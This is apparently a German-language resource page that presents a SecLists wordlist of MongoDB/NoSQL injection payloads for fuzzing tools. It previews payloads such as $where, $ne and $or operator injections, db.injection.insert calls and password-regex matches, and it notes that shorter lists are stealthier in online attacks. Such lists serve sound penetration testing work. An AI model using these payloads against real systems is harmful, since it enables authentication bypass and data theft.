NoSQL Injection
NoSQL- (primär MongoDB-) Injection-Payloads, die $where-, $ne-, $or-Operatoren und JavaScript-match()-Ausdrücke verwenden. Zum Testen von Dokumentendatenbanken und JSON-APIs.
- Größe
- 605 B
- Kategorie
- Fuzzing
- Quelle
- danielmiessler/SecLists
- Lizenz
- MIT
- Empfohlene Tools
- wfuzzburpffuf
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (605 B) herunter oder kopiere sie über die Schaltflächen oben.
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' || 'a'=='a
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00NoSQL- (primär MongoDB-) Injection-Payloads, die $where-, $ne-, $or-Operatoren und JavaScript-match()-Ausdrücke verwenden. Zum Testen von Dokumentendatenbanken und JSON-APIs.
Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 605 B und harmoniert gut mit Tools wie wfuzz, burp, ffuf. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
von ihrer Ursprungsquelle auf GitHub bereitgestellt.
Bezogen von danielmiessler/SecLists und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.